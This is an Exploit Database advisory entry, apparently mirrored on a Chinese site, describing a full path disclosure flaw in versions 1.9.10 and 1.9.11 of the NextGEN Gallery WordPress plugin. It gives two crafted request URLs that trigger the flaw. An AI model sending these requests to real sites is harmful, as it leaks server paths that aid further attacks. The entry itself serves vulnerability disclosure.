WordPress Plugin NextGEN Gallery – Full Path Disclosure

• Exploit Database
• 39 阅读

• 作者： Henrique Montenegro
  日期： 2013-02-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38314/

• source: https://www.securityfocus.com/bid/57957/info
  
  The NextGEN Gallery plugin for WordPress is prone to a path-disclosure vulnerability. 
  
  An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. 
  
  NextGEN Gallery versions 1.9.10 and 1.9.11 are vulnerable; other versions may also be affected.
  
  http://www.example.com/?callback=json&api_key=true&format=json&method=gallery&id=1 
  
  http://www.example.com/?callback=json&api_key=true&format=xml&method=recent&limit=1